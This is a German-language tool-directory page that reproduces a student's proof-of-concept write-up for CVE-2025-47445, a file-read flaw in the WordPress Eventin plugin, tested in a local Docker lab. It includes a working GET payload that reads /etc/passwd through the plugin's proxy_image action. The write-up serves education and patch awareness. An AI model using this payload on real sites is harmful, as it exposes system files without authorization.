Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-47445-PoC — Proof of Concept für CVE-2025-47445 | Kitploit
Tools/GitHubGitHub/inverterad/cve-2025-47445-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubinverterad/cve-2025-47445-poc

CVE-2025-47445-PoC

Proof of Concept für CVE-2025-47445

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-47445 PoC

Dieser Proof of Concept basiert auf einer Schulaufgabe, bei der wir ein verwundbares wordpress Plugin finden und die genannte Schwachstelle in einer lokalen kontrollierten Umgebung testen wollten.

Info
Wordpress plugin:Wordpress Eventin
Plugin version:4.0.26 (or older)
CVE information:Project Discovery - Vulnerability library
CVEdetails.com
Tools of interest:Wordfence Lab Environment
Docker
Burp Suite
Nuclei

Einrichten der Umgebung

Das Worfence Docker WordPress Research Lab wird mit zwei verschiedenen Umgebungen geliefert, eine mit einer älteren PHP-Version, wir wählen die neuere.

root@kitploit:~
# In the dockerwp84 folder
docker-compose build
docker-compose up -d

Danach habe ich die Wordpress-Seite über localhost:1337 eingerichtet. Ich lade das Eventin-Plugin, speziell Version 4.0.26, aus dem Plugin-Store herunter und installiere und aktiviere es über die Wordpress-Oberfläche.

Jetzt sollte alles bereit sein.

DAST / Nuclei

Ich möchte sehen, ob Nuclei die gesuchte CVE finden kann, also starte ich eine Instanz in einem temporären Docker-Container.

root@kitploit:~
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337

Ich habe Nuclei mehrmals ausgeführt und verschiedene Ergebnisse erhalten, ich bin nicht sicher warum. Aber schließlich findet es die CVE und ein paar andere Dinge, nach denen ich nicht spezifisch gesucht habe.

Nuclei screenshot

Burp / Manueller Test

Um zu sehen, ob ich auf die /etc/passwd-Datei zugreifen kann, füge ich einfach den folgenden Payload in meine GET-Anfrage ein.

root@kitploit:~
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd

Und es war ein Erfolg.

Burp screenshot

Schlussfolgerungen

Dies wurde zu Bildungszwecken durchgeführt.

Stellen Sie sicher, dass Sie Ihre gesamte Software aktualisieren. Täglich werden neue CVEs gefunden.

Tool herunterladen